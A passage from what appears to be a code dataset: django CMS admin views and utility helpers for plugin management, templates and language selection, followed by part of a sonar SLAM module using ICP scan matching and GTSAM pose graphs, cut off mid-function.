'alt': force_escape(escapejs(cms_plugin.get_instance_icon_alt())),
'cancel': True,
}
instance = cms_plugin.get_plugin_instance()[0]
if not instance:
# cancelled before any content was added to plugin
cms_plugin.delete()
context.update({
"deleted":True,
})
return render_to_response('admin/cms/page/plugin_forms_ok.html', context, RequestContext(request))
if not instance:
# instance doesn't exist, call add view
response = plugin_admin.add_view(request)
else:
# already saved before, call change view
# we actually have the instance here, but since i won't override
# change_view method, is better if it will be loaded again, so
# just pass id to plugin_admin
response = plugin_admin.change_view(request, str(plugin_id))
if request.method == "POST" and plugin_admin.object_successfully_changed:
# read the saved object from plugin_admin - ugly but works
saved_object = plugin_admin.saved_object
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'plugin': saved_object,
'is_popup': True,
'name': unicode(saved_object),
"type": saved_object.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(saved_object.get_instance_icon_src()),
'alt': force_escape(escapejs(saved_object.get_instance_icon_alt())),
}
return render_to_response('admin/cms/page/plugin_forms_ok.html', context, RequestContext(request))
return response
def move_plugin(self, request):
# only allow POST
if request.method != "POST":
return HttpResponse(str("error"))
if 'plugin_id' in request.POST: # single plugin moving
plugin = CMSPlugin.objects.get(pk=int(request.POST['plugin_id']))
if 'placeholder_id' in request.POST:
placeholder = Placeholder.objects.get(pk=int(request.POST['placeholder_id']))
else:
placeholder = plugin.placeholder
# check permissions
if not placeholder.has_change_permission(request):
raise Http404
# plugin positions are 0 based, so just using count here should give us 'last_position + 1'
position = CMSPlugin.objects.filter(placeholder=placeholder).count()
plugin.placeholder = placeholder
plugin.position = position
plugin.save()
pos = 0
if 'ids' in request.POST: # multiple plugins/ reordering
whitelisted_placeholders = []
for id in request.POST['ids'].split("_"):
plugin = CMSPlugin.objects.get(pk=id)
# check the permissions for *each* plugin, but cache them locally
# per placeholder
if plugin.placeholder.pk not in whitelisted_placeholders:
if plugin.placeholder.has_change_permission(request):
whitelisted_placeholders.append(plugin.placeholder.pk)
else:
raise Http404
# actually do the moving
if plugin.position != pos:
plugin.position = pos
plugin.save()
pos += 1
else:
return HttpResponse(str("error"))
return HttpResponse(str("ok"))
def remove_plugin(self, request):
if request.method != "POST": # only allow POST
raise Http404
plugin_id = request.POST['plugin_id']
plugin = get_object_or_404(CMSPlugin, pk=plugin_id)
# check the permissions!
if not plugin.placeholder.has_delete_permission(request):
return HttpResponseForbidden(_("You don't have permission to delete a plugin"))
plugin.delete_with_public()
plugin_name = unicode(plugin_pool.get_plugin(plugin.plugin_type).name)
comment = _(u"%(plugin_name)s plugin at position %(position)s in %(placeholder)s was deleted.") % {'plugin_name':plugin_name, 'position':plugin.position, 'placeholder':plugin.placeholder}
return HttpResponse("%s,%s" % (plugin_id, comment))
def copy_plugins(self, request):
# only allow POST
if request.method != "POST":
raise Http404
placeholder_id = request.POST['placeholder']
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
# check permissions
if not placeholder.has_add_permission(request):
raise Http404
# the placeholder actions are responsible for copying, they should return
# a list of plugins if successful.
plugins = placeholder.actions.copy(
target_placeholder=placeholder,
source_language=request.POST['copy_from'],
target_language=get_language_from_request(request),
fieldname=placeholder._get_attached_field_name(),
model=placeholder._get_attached_model(),
)
if plugins:
return render_to_response('admin/cms/page/widgets/plugin_item.html',
{'plugin_list': list(plugins)}, RequestContext(request))
else:
return HttpResponseBadRequest("Error during copy")
```
#### File: cms/utils/__init__.py
```python
from cms import constants
from cms.utils.conf import get_cms_setting
from cms.utils.i18n import get_default_language, get_language_list
from distutils.version import LooseVersion
from django.conf import settings
from django.core.files.storage import get_storage_class
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.functional import LazyObject
import django
import os
import urllib
def get_template_from_request(request, obj=None, no_current_page=False):
"""
Gets a valid template from different sources or falls back to the default
template.
"""
template = None
if len(get_cms_setting('TEMPLATES')) == 1:
return get_cms_setting('TEMPLATES')[0][0]
if "template" in request.REQUEST:
template = request.REQUEST['template']
if not template and obj is not None:
template = obj.get_template()
if not template and not no_current_page and hasattr(request, "current_page"):
current_page = request.current_page
if hasattr(current_page, "get_template"):
template = current_page.get_template()
if template is not None and template in dict(get_cms_setting('TEMPLATES')).keys():
if template == constants.TEMPLATE_INHERITANCE_MAGIC and obj:
# Happens on admin's request when changing the template for a page
# to "inherit".
return obj.get_template()
return template
return get_cms_setting('TEMPLATES')[0][0]
def get_language_from_request(request, current_page=None):
"""
Return the most obvious language according the request
"""
language = request.REQUEST.get('language', None)
site_id = current_page.site_id if current_page else None
if language:
if not language in get_language_list(site_id):
language = None
if language is None:
language = getattr(request, 'LANGUAGE_CODE', None)
if language:
if not language in get_language_list(site_id):
language = None
if language is None and current_page:
# in last resort, get the first language available in the page
languages = current_page.get_languages()
if len(languages) > 0:
language = languages[0]
if language is None:
# language must be defined in CMS_LANGUAGES, so check first if there
# is any language with LANGUAGE_CODE, otherwise try to split it and find
# best match
language = get_default_language(site_id=site_id)
return language
def get_page_from_request(request):
from warnings import warn
from cms.utils.page_resolver import get_page_from_request as new
warn("'cms.utils.get_page_from_request' is deprecated in favor of "
"'cms.utils.page_resolver.get_page_from_request' and will be removed "
"in Django-CMS 2.2.", DeprecationWarning)
return new(request)
"""
The following class is taken from https://github.com/jezdez/django/compare/feature/staticfiles-templatetag
and should be removed and replaced by the django-core version in 1.4
"""
default_storage = 'django.contrib.staticfiles.storage.StaticFilesStorage'
if LooseVersion(django.get_version()) < LooseVersion('1.3'):
default_storage = 'staticfiles.storage.StaticFilesStorage'
class ConfiguredStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class(getattr(settings, 'STATICFILES_STORAGE', default_storage))()
configured_storage = ConfiguredStorage()
def cms_static_url(path):
'''
Helper that prefixes a URL with STATIC_URL and cms
'''
if not path:
return ''
return configured_storage.url(os.path.join('cms', path))
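# e.g. with the default static files storage, cms_static_url('js/csrf.js')
# typically resolves to settings.STATIC_URL + 'cms/js/csrf.js'.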
``` |
{
"source": "jinkunw/bruce",
"score": 2
} |
#### File: src/bruce_slam/slam.py
```python
import matplotlib
matplotlib.use("Agg")
from itertools import combinations
from collections import defaultdict
from enum import Enum
import cv2  # used below to rasterize/dilate target points into an occupancy mask
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial.ckdtree import cKDTree as KDTree
from scipy.optimize import shgo
from sklearn.covariance import MinCovDet
import gtsam
from .sonar import OculusProperty
from .utils.conversions import *
from .utils.visualization import *
from .utils.io import *
from . import pcl
class STATUS(Enum):
NOT_ENOUGH_POINTS = "Not enough points"
LARGE_TRANSFORMATION = "Large transformation"
NOT_ENOUGH_OVERLAP = "Not enough overlap"
NOT_CONVERGED = "Not converged"
INITIALIZATION_FAILURE = "Initialization failure"
SUCCESS = "Success"
def __init__(self, *args, **kwargs):
Enum.__init__(*args, **kwargs)
self.description = None
def __bool__(self):
return self == STATUS.SUCCESS
def __nonzero__(self):
return self == STATUS.SUCCESS
def __str__(self):
if self.description:
return self.value + ": " + self.description
else:
return self.value
class Keyframe(object):
def __init__(
self, status, time, dr_pose3, points=np.zeros((0, 2), np.float32), cov=None
):
self.status = status # used to mark keyframe
self.time = time # time
self.dr_pose3 = dr_pose3 # dead reckoning 3d pose
self.dr_pose = pose322(dr_pose3) # dead reckoning 2d pose
self.pose3 = dr_pose3 # estimated 3d pose (will be updated later)
self.pose = pose322(dr_pose3) # estimated 2d pose
self.cov = cov # cov in local frame (always 2d)
self.transf_cov = None # cov in global frame
self.points = points.astype(np.float32) # points in local frame (always 2d)
self.transf_points = None # transformed points in global frame based on pose
self.constraints = [] # Non-sequential constraints (key, odom)
self.twist = None # twist message for publishing odom
def update(self, new_pose, new_cov=None):
self.pose = new_pose
self.pose3 = n2g(
(
new_pose.x(),
new_pose.y(),
self.dr_pose3.translation().z(),
self.dr_pose3.rotation().roll(),
self.dr_pose3.rotation().pitch(),
new_pose.theta(),
),
"Pose3",
)
self.transf_points = Keyframe.transform_points(self.points, self.pose)
if new_cov is not None:
self.cov = new_cov
if self.cov is not None:
c, s = np.cos(self.pose.theta()), np.sin(self.pose.theta())
R = np.array([[c, -s], [s, c]])
self.transf_cov = np.array(self.cov)
self.transf_cov[:2, :2] = R.dot(self.transf_cov[:2, :2]).dot(R.T)
self.transf_cov[:2, 2] = R.dot(self.transf_cov[:2, 2])
self.transf_cov[2, :2] = self.transf_cov[2, :2].dot(R.T)
@staticmethod
def transform_points(points, pose):
if len(points) == 0:
return np.empty_like(points, np.float32)
T = pose.matrix().astype(np.float32)
return points.dot(T[:2, :2].T) + T[:2, 2]
class InitializationResult(object):
def __init__(self):
# all points are in local frame
self.source_points = np.zeros((0, 2))
self.target_points = np.zeros((0, 2))
self.source_key = None
self.target_key = None
self.source_pose = None
self.target_pose = None
# Cov for sampling
self.cov = None
self.occ = None
self.status = None
self.estimated_source_pose = None
self.source_pose_samples = None
def plot(self, title):
# fmt: off
plt.figure()
# Plot in global frame
points = Keyframe.transform_points(self.target_points, self.target_pose)
plt.plot(points[:, 0], points[:, 1], "k.", ms=1, label="target points")
plt.plot(self.source_pose.x(), self.source_pose.y(), "r+", ms=10)
points = Keyframe.transform_points(self.source_points, self.source_pose)
plt.plot(points[:, 0], points[:, 1], "r.", ms=1, label="source points (guess)")
if self.cov is not None:
c, s = np.cos(self.source_pose.theta()), np.sin(self.source_pose.theta())
R = np.array([[c, -s], [s, c]])
cov = R.dot(self.cov[:2, :2]).dot(R.T)
plot_cov_ellipse((self.source_pose.x(), self.source_pose.y()), cov, nstd=3, fill=False, color="r")
if self.estimated_source_pose is not None:
plt.plot(self.estimated_source_pose.x(), self.estimated_source_pose.y(), "g+", ms=10)
points = Keyframe.transform_points(self.source_points, self.estimated_source_pose)
plt.plot(points[:, 0], points[:, 1], "g.", ms=1, label="source points (initialized)")
if self.source_pose_samples is not None:
poses = np.array(self.source_pose_samples)
plt.scatter(poses[:, 0], poses[:, 1], c=poses[:, 3], s=1, label="pose samples")
plt.colorbar()
if self.occ:
x0, y0, resolution, occ_arr = self.occ
x1 = x0 + (occ_arr.shape[1] - 0.5) * resolution
y1 = y0 + (occ_arr.shape[0] - 0.5) * resolution
plt.imshow(occ_arr, origin='upper', extent=(x0, x1, y1, y0), cmap='Greys', vmin=0, vmax=1, alpha=0.5)
plt.colorbar()
plt.legend()
plt.gca().invert_yaxis()
plt.axis("equal")
plt.title(str(self.status))
plt.savefig(title, dpi=100)
plt.close("all")
# fmt: on
def save(self, filename):
np.savez(
filename,
source_points=self.source_points,
target_points=self.target_points,
source_pose=g2n(self.source_pose),
target_pose=g2n(self.target_pose),
estimated_source_pose=g2n(self.estimated_source_pose),
)
class ICPResult(object):
def __init__(self, init_ret, use_samples=False, sample_eps=0.01):
# all points are in local frame
self.source_points = init_ret.source_points
self.target_points = init_ret.target_points
self.source_key = init_ret.source_key
self.target_key = init_ret.target_key
self.source_pose = init_ret.source_pose
self.target_pose = init_ret.target_pose
self.status = init_ret.status
if init_ret.estimated_source_pose is not None:
self.initial_transform = self.target_pose.between(
init_ret.estimated_source_pose
)
else:
self.initial_transform = self.target_pose.between(self.source_pose)
self.estimated_transform = None
# Cov derived from ICP
self.cov = None
self.initial_transforms = None
if use_samples and init_ret.source_pose_samples is not None:
idx = np.argsort(init_ret.source_pose_samples[:, -1])
transforms = [
self.target_pose.between(n2g(g, "Pose2"))
for g in init_ret.source_pose_samples[idx, :3]
]
filtered = [transforms[0]]
for b in transforms[1:]:
d = np.linalg.norm(g2n(filtered[-1].between(b)))
if d < sample_eps:
continue
else:
filtered.append(b)
self.initial_transforms = filtered
self.sample_transforms = None
# Whether the result is inserted to factor graph
self.inserted = False
def plot(self, title):
# fmt: off
plt.figure()
# Plot in target frame
plt.plot(self.target_points[:, 0], self.target_points[:, 1], "k.", ms=1, label="target points")
plt.plot(self.initial_transform.x(), self.initial_transform.y(), "r+", ms=10)
points = Keyframe.transform_points(self.source_points, self.initial_transform)
plt.plot(points[:, 0], points[:, 1], "r.", ms=1, label="source points (guess)")
if self.estimated_transform is not None:
plt.plot(self.estimated_transform.x(), self.estimated_transform.y(), "g+", ms=10)
points = Keyframe.transform_points(self.source_points, self.estimated_transform)
plt.plot(points[:, 0], points[:, 1], "g.", ms=1, label="source points (estimated)")
if self.cov is not None:
cov = self.cov[:2, :2]
c, s = np.cos(self.estimated_transform.theta()), np.sin(self.estimated_transform.theta())
R = np.array([[c, -s], [s, c]])
cov = R.dot(cov).dot(R.T)
plot_cov_ellipse((self.estimated_transform.x(), self.estimated_transform.y()), cov, nstd=3, color="g", fill=False)
if self.sample_transforms is not None:
plt.scatter(self.sample_transforms[:, 0], self.sample_transforms[:, 1], color='c', s=1, label="sample estimate")
plt.legend()
plt.axis("equal")
plt.gca().invert_yaxis()
plt.title(str(self.status))
plt.savefig(title, dpi=100)
plt.close("all")
# fmt: on
def save(self, filename):
np.savez(
filename,
source_points=self.source_points,
target_points=self.target_points,
source_pose=g2n(self.source_pose),
target_pose=g2n(self.target_pose),
initial_transform=g2n(self.initial_transform),
estimated_transform=g2n(self.estimated_transform),
cov=self.cov,
)
class SMParams(object):
def __init__(self):
# Use occupancy probability map matching to initialize ICP
self.initialization = None
# Global search params
self.initialization_params = None
# Minimum number of points
self.min_points = None
# Max deviation from initial guess
self.max_translation = None
self.max_rotation = None
# Min separation between source key and the last target frame
self.min_st_sep = None
# Number of source frames to build source points
# Not used in SSM
self.source_frames = None
# Number of target frames to build target points
# Not used in NSSM
self.target_frames = None
# Number of ICP instances to run to calculate cov
self.cov_samples = None
class SLAM(object):
def __init__(self):
self.oculus = OculusProperty()
# Create a new factor when
# - |ti - tj| > min_duration and
# - |xi - xj| > max_translation or
# - |ri - rj| > max_rotation
self.keyframe_duration = None
self.keyframe_translation = None
self.keyframe_rotation = None
# List of keyframes
self.keyframes = []
# Current (non-key)frame with real-time pose update
# FIXME propagate cov from previous keyframe
self.current_frame = None
self.isam_params = gtsam.ISAM2Params()
self.graph = gtsam.NonlinearFactorGraph()
self.values = gtsam.Values()
# [x, y, theta]
self.prior_sigmas = None
# Noise model without ICP
# [x, y, theta]
self.odom_sigmas = None
# Downsample point cloud for ICP and publishing
self.point_resolution = 0.5
# Noise radius in overlap
self.point_noise = 0.5
self.ssm_params = SMParams()
self.ssm_params.initialization = True
self.ssm_params.initialization_params = 50, 1, 0.01
self.ssm_params.min_st_sep = 1
self.ssm_params.min_points = 50
self.ssm_params.max_translation = 2.0
self.ssm_params.max_rotation = np.pi / 6
self.ssm_params.target_frames = 3
# Don't use ICP covariance
self.ssm_params.cov_samples = 0
self.nssm_params = SMParams()
self.nssm_params.initialization = True
self.nssm_params.initialization_params = 100, 5, 0.01
self.nssm_params.min_st_sep = 10
self.nssm_params.min_points = 100
self.nssm_params.max_translation = 6.0
self.nssm_params.max_rotation = np.pi / 2
self.nssm_params.source_frames = 5
self.nssm_params.cov_samples = 30
self.icp = pcl.ICP()
# Pairwise consistent measurement
self.nssm_queue = []
self.pcm_queue_size = 5
self.min_pcm = 3
# Use fixed noise model in two cases
# - Sequential scan matching
# - ICP cov is too small in non-sequential scan matching
# [x, y, theta]
self.icp_odom_sigmas = None
# FIXME Can't save fig in online mode
self.save_fig = False
self.save_data = False
@property
def current_keyframe(self):
return self.keyframes[-1]
@property
def current_key(self):
return len(self.keyframes)
def configure(self):
assert (
self.nssm_params.cov_samples == 0
or self.nssm_params.cov_samples
< self.nssm_params.initialization_params[0]
* self.nssm_params.initialization_params[1]
)
assert (
self.ssm_params.cov_samples == 0
or self.ssm_params.cov_samples
< self.ssm_params.initialization_params[0]
* self.ssm_params.initialization_params[1]
)
assert self.nssm_params.source_frames < self.nssm_params.min_st_sep
self.prior_model = self.create_noise_model(self.prior_sigmas)
self.odom_model = self.create_noise_model(self.odom_sigmas)
self.icp_odom_model = self.create_noise_model(self.icp_odom_sigmas)
self.isam = gtsam.ISAM2(self.isam_params)
def get_states(self):
"""
Retrieve all states as array which are represented as
[time, pose2, dr_pose3, cov]
- pose2: [x, y, yaw]
- dr_pose3: [x, y, z, roll, pitch, yaw]
- cov: 3 x 3
"""
states = np.zeros(
self.current_key,
dtype=[
("time", np.float64),
("pose", np.float32, 3),
("dr_pose3", np.float32, 6),
("cov", np.float32, 9),
],
)
# Update all
values = self.isam.calculateEstimate()
for key in range(self.current_key):
pose = values.atPose2(X(key))
cov = self.isam.marginalCovariance(X(key))
self.keyframes[key].update(pose, cov)
t0 = self.keyframes[0].time
for key in range(self.current_key):
keyframe = self.keyframes[key]
states[key]["time"] = (keyframe.time - t0).to_sec()
states[key]["pose"] = g2n(keyframe.pose)
states[key]["dr_pose3"] = g2n(keyframe.dr_pose3)
states[key]["cov"] = keyframe.transf_cov.ravel()
return states
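# e.g. states["pose"][k] is the [x, y, yaw] of keyframe k and
# states["cov"][k].reshape(3, 3) is its marginal covariance in the global frame.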
@staticmethod
def sample_pose(pose, covariance):
delta = np.random.multivariate_normal(np.zeros(3), covariance)
return pose.compose(n2g(delta, "Pose2"))
def sample_current_pose(self):
return self.sample_pose(self.current_keyframe.pose, self.current_keyframe.cov)
def get_points(self, frames=None, ref_frame=None, return_keys=False):
"""
- Accumulate points in frames
- Transform them to reference frame
- Downsample points
- Return the corresponding keys for every point
"""
if frames is None:
frames = range(self.current_key)
if ref_frame is not None:
if isinstance(ref_frame, gtsam.Pose2):
ref_pose = ref_frame
else:
ref_pose = self.keyframes[ref_frame].pose
# Add empty point in case all points are empty
if return_keys:
all_points = [np.zeros((0, 3), np.float32)]
else:
all_points = [np.zeros((0, 2), np.float32)]
for key in frames:
if ref_frame is not None:
points = self.keyframes[key].points
pose = self.keyframes[key].pose
transf = ref_pose.between(pose)
transf_points = Keyframe.transform_points(points, transf)
else:
transf_points = self.keyframes[key].transf_points
if return_keys:
transf_points = np.c_[
transf_points, key * np.ones((len(transf_points), 1))
]
all_points.append(transf_points)
all_points = np.concatenate(all_points)
if return_keys:
return pcl.downsample(
all_points[:, :2], all_points[:, (2,)], self.point_resolution
)
else:
return pcl.downsample(all_points, self.point_resolution)
def compute_icp(self, source_points, target_points, guess=gtsam.Pose2()):
source_points = np.array(source_points, np.float32)
target_points = np.array(target_points, np.float32)
guess = guess.matrix()
message, T = self.icp.compute(source_points, target_points, guess)
# ICP covariance is too small
# cov = self.icp.getCovariance()
x, y = T[:2, 2]
theta = np.arctan2(T[1, 0], T[0, 0])
return message, gtsam.Pose2(x, y, theta)
def compute_icp_with_cov(self, source_points, target_points, guesses):
"""
guesses: list of initial samples
"""
source_points = np.array(source_points, np.float32)
target_points = np.array(target_points, np.float32)
sample_transforms = []
for g in guesses:
g = g.matrix()
message, T = self.icp.compute(source_points, target_points, g)
if message == "success":
x, y = T[:2, 2]
theta = np.arctan2(T[1, 0], T[0, 0])
sample_transforms.append((x, y, theta))
sample_transforms = np.array(sample_transforms)
if len(sample_transforms) < 5:
return "Too few samples for covariance computation", None, None, None
# Can't use np.cov(). Too many outliers
try:
fcov = MinCovDet(False, support_fraction=0.8).fit(sample_transforms)
except ValueError as e:
return "Failed to calculate covariance", None, None, None
m = n2g(fcov.location_, "Pose2")
cov = fcov.covariance_
# unrotate to local frame
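        # (rotates the x-y block of the covariance, and its cross terms with theta,
        # by R^T ... R so that the translational uncertainty is expressed in the
        # local frame of the fitted mean m rather than in the target frame)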
R = m.rotation().matrix()
cov[:2, :] = R.T.dot(cov[:2, :])
cov[:, :2] = cov[:, :2].dot(R)
default_cov = np.diag(self.icp_odom_sigmas) ** 2
if np.linalg.det(cov) < np.linalg.det(default_cov):
cov = default_cov
return "success", m, cov, sample_transforms
def get_overlap(
self,
source_points,
target_points,
source_pose=None,
target_pose=None,
return_indices=False,
):
if source_pose:
source_points = Keyframe.transform_points(source_points, source_pose)
if target_pose:
target_points = Keyframe.transform_points(target_points, target_pose)
indices, dists = pcl.match(target_points, source_points, 1, self.point_noise)
if return_indices:
return np.sum(indices != -1), indices
else:
return np.sum(indices != -1)
def add_prior(self, keyframe):
# pose = gtsam.Pose2()
pose = keyframe.pose
factor = gtsam.PriorFactorPose2(X(0), pose, self.prior_model)
self.graph.add(factor)
self.values.insert(X(0), pose)
def add_odometry(self, keyframe):
dt = (keyframe.time - self.keyframes[-1].time).to_sec()
dr_odom = self.keyframes[-1].pose.between(keyframe.pose)
factor = gtsam.BetweenFactorPose2(
X(self.current_key - 1), X(self.current_key), dr_odom, self.odom_model
)
self.graph.add(factor)
self.values.insert(X(self.current_key), keyframe.pose)
def get_map(self, frames, resolution=None):
# Implemented in slam_node
raise NotImplementedError
def get_matching_cost_subroutine1(
self,
source_points,
source_pose,
target_points,
target_pose,
source_pose_cov=None,
):
"""
Cost = - sum_i log p_i(Tx s_i \in S | t_i \in T),
given transform Tx, source points S, target points T
            p_i(z_i | T) = - prob_tp  if there exists ||Tx s_i - t_i|| < sigma,
                           - prob_fp  otherwise
"""
# pose_samples = []
# target_tree = KDTree(target_points)
# def subroutine(x):
# # x = [x, y, theta]
# delta = n2g(x, "Pose2")
# sample_source_pose = source_pose.compose(delta)
# sample_transform = target_pose.between(sample_source_pose)
# points = Keyframe.transform_points(source_points, sample_transform)
# dists, indices = target_tree.query(
# points, distance_upper_bound=self.point_noise
# )
# cost = -np.sum(indices != len(target_tree.data))
# pose_samples.append(np.r_[g2n(sample_source_pose), cost])
# return cost
# return subroutine, pose_samples
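        # Active implementation below: rasterize the target points into a binary grid
        # and dilate it by point_noise, so a transformed source point scores a hit
        # whenever it lands within (approximately) point_noise of some target point --
        # the same test as the KD-tree version above, but with O(1) lookups per point.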
pose_samples = []
xmin, ymin = np.min(target_points, axis=0) - 2 * self.point_noise
xmax, ymax = np.max(target_points, axis=0) + 2 * self.point_noise
resolution = self.point_noise / 10.0
xs = np.arange(xmin, xmax, resolution)
ys = np.arange(ymin, ymax, resolution)
target_grids = np.zeros((len(ys), len(xs)), np.uint8)
r = np.int32(np.round((target_points[:, 1] - ymin) / resolution))
c = np.int32(np.round((target_points[:, 0] - xmin) / resolution))
r = np.clip(r, 0, target_grids.shape[0] - 1)
c = np.clip(c, 0, target_grids.shape[1] - 1)
target_grids[r, c] = 255
dilate_hs = int(np.ceil(self.point_noise / resolution))
dilate_size = 2 * dilate_hs + 1
kernel = cv2.getStructuringElement(
cv2.MORPH_ELLIPSE, (dilate_size, dilate_size), (dilate_hs, dilate_hs)
)
target_grids = cv2.dilate(target_grids, kernel)
# # Calculate distance to the nearest points
# target_grids = cv2.bitwise_not(target_grids)
# target_grids = cv2.distanceTransform(target_grids, cv2.DIST_L2, 3)
# target_grids = 1.0 - 0.2 * target_grids / self.point_noise
# target_grids = np.clip(target_grids, 0.2, 1.0)
source_pose_info = np.linalg.inv(source_pose_cov)
def subroutine(x):
# x = [x, y, theta]
delta = n2g(x, "Pose2")
sample_source_pose = source_pose.compose(delta)
sample_transform = target_pose.between(sample_source_pose)
points = Keyframe.transform_points(source_points, sample_transform)
r = np.int32(np.round((points[:, 1] - ymin) / resolution))
c = np.int32(np.round((points[:, 0] - xmin) / resolution))
inside = (
(0 <= r)
& (r < target_grids.shape[0])
& (0 <= c)
& (c < target_grids.shape[1])
)
cost = -np.sum(target_grids[r[inside], c[inside]] > 0)
pose_samples.append(np.r_[g2n(sample_source_pose), cost])
return cost
return subroutine, pose_samples
def get_matching_cost_subroutine2(self, source_points, source_pose, occ):
"""
Ceres scan matching
Cost = - sum_i ||1 - M_nearest(Tx s_i)||^2,
given transform Tx, source points S, occupancy map M
"""
pose_samples = []
x0, y0, resolution, occ_arr = occ
def subroutine(x):
# x = [x, y, theta]
delta = n2g(x, "Pose2")
sample_pose = source_pose.compose(delta)
xy = Keyframe.transform_points(source_points, sample_pose)
r = np.int32(np.round((xy[:, 1] - y0) / resolution))
c = np.int32(np.round((xy[:, 0] - x0) / resolution))
sel = (r >= 0) & (c >= 0) & (r < occ_arr.shape[0]) & (c < occ_arr.shape[1])
hit_probs_inside_map = occ_arr[r[sel], c[sel]]
num_hits_outside_map = len(xy) - np.sum(sel)
cost = (
np.sum((1.0 - hit_probs_inside_map) ** 2)
+ num_hits_outside_map * (1.0 - 0.5) ** 2
)
cost = np.sqrt(cost / len(source_points))
pose_samples.append(np.r_[g2n(sample_pose), cost])
return cost
return subroutine, pose_samples
#######################################################
# TODO Merge SSM and NSSM together
#######################################################
def initialize_sequential_scan_matching(self, keyframe):
ret = InitializationResult()
ret.status = STATUS.SUCCESS
ret.status.description = None
# Match current keyframe to previous k frames
ret.source_key = self.current_key
ret.target_key = self.current_key - 1
ret.source_pose = keyframe.pose
ret.target_pose = self.current_keyframe.pose
# Accumulate reference points from previous k frames
ret.source_points = keyframe.points
target_frames = range(self.current_key)[-self.ssm_params.target_frames :]
ret.target_points = self.get_points(target_frames, ret.target_key)
ret.cov = np.diag(self.odom_sigmas)
if len(ret.source_points) < self.ssm_params.min_points:
ret.status = STATUS.NOT_ENOUGH_POINTS
ret.status.description = "source points {}".format(len(ret.source_points))
return ret
if len(ret.target_points) < self.ssm_params.min_points:
ret.status = STATUS.NOT_ENOUGH_POINTS
ret.status.description = "target points {}".format(len(ret.target_points))
return ret
if not self.ssm_params.initialization:
return ret
with CodeTimer("SLAM - sequential scan matching - sampling"):
pose_stds = np.array([self.odom_sigmas]).T
pose_bounds = 5.0 * np.c_[-pose_stds, pose_stds]
# ret.occ = self.get_map(target_frames)
# subroutine, pose_samples = self.get_matching_cost_subroutine2(
# ret.source_points,
# ret.source_pose,
# ret.occ,
# )
subroutine, pose_samples = self.get_matching_cost_subroutine1(
ret.source_points,
ret.source_pose,
ret.target_points,
ret.target_pose,
ret.cov,
)
result = shgo(
func=subroutine,
bounds=pose_bounds,
n=self.ssm_params.initialization_params[0],
iters=self.ssm_params.initialization_params[1],
sampling_method="sobol",
minimizer_kwargs={
"options": {"ftol": self.ssm_params.initialization_params[2]}
},
)
if result.success:
ret.source_pose_samples = np.array(pose_samples)
ret.estimated_source_pose = ret.source_pose.compose(n2g(result.x, "Pose2"))
ret.status.description = "matching cost {:.2f}".format(result.fun)
if self.save_data:
ret.save("step-{}-ssm-sampling.npz".format(self.current_key))
else:
ret.status = STATUS.INITIALIZATION_FAILURE
ret.status.description = result.message
return ret
def add_sequential_scan_matching(self, keyframe):
"""
Add sequential scan matching factor.
kf[t - k] -- ... -- kf[t - 2] -- kf[t - 1] -- kf[t]
|_________|________|_____________| |
target points in kf[t - 1] source points
"""
ret = self.initialize_sequential_scan_matching(keyframe)
if self.save_fig:
ret.plot("step-{}-ssm-sampling.png".format(self.current_key))
if not ret.status:
self.add_odometry(keyframe)
return
ret2 = ICPResult(ret, self.ssm_params.cov_samples > 0)
# Compute ICP here with a timer
with CodeTimer("SLAM - sequential scan matching - ICP"):
if self.ssm_params.initialization and self.ssm_params.cov_samples > 0:
message, odom, cov, sample_transforms = self.compute_icp_with_cov(
ret2.source_points,
ret2.target_points,
ret2.initial_transforms[: self.ssm_params.cov_samples],
)
if message != "success":
ret2.status = STATUS.NOT_CONVERGED
ret2.status.description = message
else:
ret2.estimated_transform = odom
ret2.cov = cov
ret2.sample_transforms = sample_transforms
ret2.status.description = "{} samples".format(
len(ret2.sample_transforms)
)
else:
message, odom = self.compute_icp(
ret2.source_points, ret2.target_points, ret2.initial_transform
)
if message != "success":
ret2.status = STATUS.NOT_CONVERGED
ret2.status.description = message
else:
ret2.estimated_transform = odom
ret2.status.description = ""
# Add some failure detections
# The transformation compared to dead reckoning can't be too large
if ret2.status:
delta = ret2.initial_transform.between(ret2.estimated_transform)
delta_translation = delta.translation().norm()
delta_rotation = abs(delta.theta())
if (
delta_translation > self.ssm_params.max_translation
or delta_rotation > self.ssm_params.max_rotation
):
ret2.status = STATUS.LARGE_TRANSFORMATION
ret2.status.description = "trans {:.2f} rot {:.2f}".format(
delta_translation, delta_rotation
)
# There must be enough overlap between two point clouds.
if ret2.status:
overlap = self.get_overlap(
ret2.source_points, ret2.target_points, ret2.estimated_transform
)
if overlap < self.ssm_params.min_points:
ret2.status = STATUS.NOT_ENOUGH_OVERLAP
ret2.status.description = "overlap {}".format(overlap)
if ret2.status:
if ret2.cov is not None:
icp_odom_model = self.create_full_noise_model(ret2.cov)
else:
icp_odom_model = self.icp_odom_model
factor = gtsam.BetweenFactorPose2(
X(ret2.target_key),
X(ret2.source_key),
ret2.estimated_transform,
icp_odom_model,
)
self.graph.add(factor)
self.values.insert(
X(ret2.source_key), ret2.target_pose.compose(ret2.estimated_transform)
)
ret2.inserted = True
if self.save_data:
ret2.save("step-{}-ssm-icp.npz".format(self.current_key))
else:
self.add_odometry(keyframe)
if self.save_fig:
ret2.plot("step-{}-ssm-icp.png".format(self.current_key))
def initialize_nonsequential_scan_matching(self):
ret = InitializationResult()
ret.status = STATUS.SUCCESS
ret.status.description = None
ret.source_key = self.current_key - 1
ret.source_pose = self.current_frame.pose
ret.estimated_source_pose = ret.source_pose
source_frames = range(
ret.source_key, ret.source_key - self.nssm_params.source_frames, -1
)
ret.source_points = self.get_points(source_frames, ret.source_key)
if len(ret.source_points) < self.nssm_params.min_points:
ret.status = STATUS.NOT_ENOUGH_POINTS
ret.status.description = "source points {}".format(len(ret.source_points))
return ret
# Find target points for matching
# Limit searching keyframes
target_frames = range(self.current_key - self.nssm_params.min_st_sep)
# Target points in global frame
target_points, target_keys = self.get_points(target_frames, None, True)
# Further limit points based on source pose uncertainty
sel = np.zeros(len(target_points), np.bool)
for source_frame in source_frames:
pose = self.keyframes[source_frame].pose
cov = self.keyframes[source_frame].cov
translation_std = np.sqrt(np.max(np.linalg.eigvals(cov[:2, :2])))
rotation_std = np.sqrt(cov[2, 2])
